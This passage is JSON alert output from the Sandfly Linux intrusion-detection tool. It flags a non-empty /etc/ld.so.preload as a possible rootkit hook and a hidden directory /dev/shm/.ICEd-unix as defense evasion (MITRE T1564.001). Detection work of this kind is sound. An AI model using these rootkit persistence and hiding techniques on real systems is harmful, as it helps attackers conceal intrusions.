        "sha512": "b6e41bb43f42e039d2d20a008a6d6bf14d0075929703e930da18ff80db40511f42192253f187c84c7b894b3abb8ef486467cabf2db6f77e31c252b4b9ff309ab"
      },
      "mode": "0100644",
      "name": "ld.so.preload",
      "path": "/etc/ld.so.preload",
      "size": 18,
      "flags": {
        "link": false,
        "sgid": false,
        "suid": false,
        "device": false,
        "hidden": false,
        "socket": false,
        "sticky": false,
        "deleted": false,
        "regular": true,
        "directory": false,
        "immutable": false,
        "sgid_root": false,
        "suid_root": false,
        "named_pipe": false,
        "char_device": false
      },
      "inode": 70867,
      "nlink": 1,
      "blocks": 8,
      "device": 64513,
      "blksize": 4096,
      "entropy": 3.57,
      "rdevice": 0,
      "gid_name": "root",
      "uid_name": "root",
      "extension": ".preload",
      "magic_num": {
        "hex": "",
        "text": "",
        "type": "unknown",
        "class": "unknown",
        "expected_extensions": null
      },
      "path_link": "",
      "path_root": "/etc/",
      "size_mismatch": false,
      "size_byte_count": 18
    },
    "response": {
      "log": {
        "error": false
      },
      "file": {
        "error": false
      },
      "user": {
        "error": false
      },
      "process": {
        "error": false,
        "killed": false,
        "suspended": false
      },
      "directory": {
        "error": false
      }
    },
    "explanation": "The file '/etc/ld.so.preload' shows a non-zero size of 18 bytes. This file is used to load libraries that can intercept system calls for all users. While it can have legitimate uses (such as for debuggers), it also is used by stealth rootkits to hide activity. You should investigate this file to make sure the libraries listed are legitimate and needed on this system and aren't malicious entries. The data field shows all entries from this file so you can see if they are legitimate."
  },
  "end_time": "2021-12-10T18:52:52Z",
  "severity": 3,
  "start_time": "2021-12-10T18:52:52Z",
  "status_msg": "ok",
  "exec_seconds": 0,
  "uid_username": "root",
  "euid_username": "root",
  "output_format": "3.0"
}
{
  "pid": 7133,
  "uid": 0,
  "euid": 0,
  "name": "dirs_hidden_dev_shm",
  "tags": [
    "attack.id.T1564.001",
    "attack.tactic.defense_evasion",
    "directory"
  ],
  "type": "directory",
  "engine": "sandfly_engine_dir",
  "status": "alert",
  "results": {
    "response": {
      "log": {
        "error": false
      },
      "file": {
        "error": false
      },
      "user": {
        "error": false
      },
      "process": {
        "error": false,
        "killed": false,
        "suspended": false
      },
      "directory": {
        "error": false
      }
    },
    "directory": {
      "gid": 0,
      "uid": 0,
      "date": {
        "created": "2021-12-10T18:49:45Z",
        "accessed": "2021-12-10T19:11:05Z",
        "modified": "2021-12-10T18:49:45Z",
        "created_minutes": 21,
        "accessed_minutes": 0,
        "modified_minutes": 21
      },
      "mode": "040755",
      "name": ".ICEd-unix",
      "path": "/dev/shm/.ICEd-unix",
      "size": 40,
      "count": 2,
      "flags": {
        "link": false,
        "hidden": true,
        "sticky": false,
        "deleted": false
      },
      "inode": 3,
      "nlink": 2,
      "device": 27,
      "rdevice": 0,
      "gid_name": "root",
      "uid_name": "root",
      "extension": ".ICEd-unix",
      "path_link": "",
      "path_root": "/dev/shm/",
      "count_mismatch": false
    },
    "explanation": "The directory '/dev/shm/.ICEd-unix' was found under '/dev/shm/' and is hidden. This is an unusual location for a hidden directory and can often be malicious. It is owned by UID '0' and was created on 2021-12-10T18:49:45Z."
  },
  "end_time": "2021-12-10T19:11:05Z",
  "severity": 3,
  "start_time": "2021-12-10T19:11:05Z",
  "status_msg": "ok",
  "exec_seconds": 0,
  "uid_username": "root",
  "euid_username": "root",
  "output_format": "3.0"
}

Let Sandfly keep your Linux systems secure.

Learn More